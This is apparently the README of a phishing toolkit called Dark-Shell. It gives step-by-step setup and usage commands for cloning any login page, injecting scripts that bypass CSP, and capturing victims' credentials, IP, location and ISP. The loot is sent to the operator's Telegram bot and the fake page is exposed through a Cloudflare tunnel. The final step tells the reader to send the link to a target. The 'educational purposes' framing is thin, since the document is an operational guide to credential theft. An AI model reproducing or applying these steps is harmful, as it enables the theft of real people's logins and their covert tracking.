Advanced Web-Cloning & Phishing Intelligence Tool with Real-time Telegram Alerts
Dark-Shell is a sophisticated automated framework designed for security researchers and educational purposes. It clones login pages, injects stealth tracking scripts, and delivers captured credentials alongside victim metadata (IP, Location, ISP) directly to your Telegram Bot.
- ⚡ Instant Web Cloner: Clone any login page in seconds.
- 📍 Deep Metadata Tracking: Capture Target's Real IP, City, Country, and ISP.
- 📱 Telegram Integration: Instant alerts on your phone for every hit.
- 🔐 Stealth Injection: Uses advanced JS and PHP headers to bypass CSP and capture data.
- 🌐 Cloudflare Tunneling: Ready to go live on the internet without manual port forwarding.
- Python: Download from python.org. (Check "Add Python to PATH" during installation).
- PHP: Download from windows.php.net. Extract to
C:\phpand add to System PATH.
sudo apt update
sudo apt install python3 python3-pip php-cli git curl -y- Cloudflared
curl -L --output cloudflared.deb https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64.deb
sudo dpkg -i cloudflared.deb# Clone the repository
git clone https://github.com/kalpatharaka/Dark-Shell.git
cd Dark-Shell# Install Python requirements
pip install -r requirements.txt# Open modules/cloner.py
nano modules/cloner.py.- Find $botToken and replace it with your Token from @botToken
- Find $chatId and replace it with your ID from @IDBot
python3 main.py- Select Option 01 to clone a target website.
- Select Option 02 to start the local phishing server.
Open a new terminal and launch the tunnel:
cloudflared tunnel --protocol http2 --url http://localhost:8080- Copy the .trycloudflare.com link and send it to your target.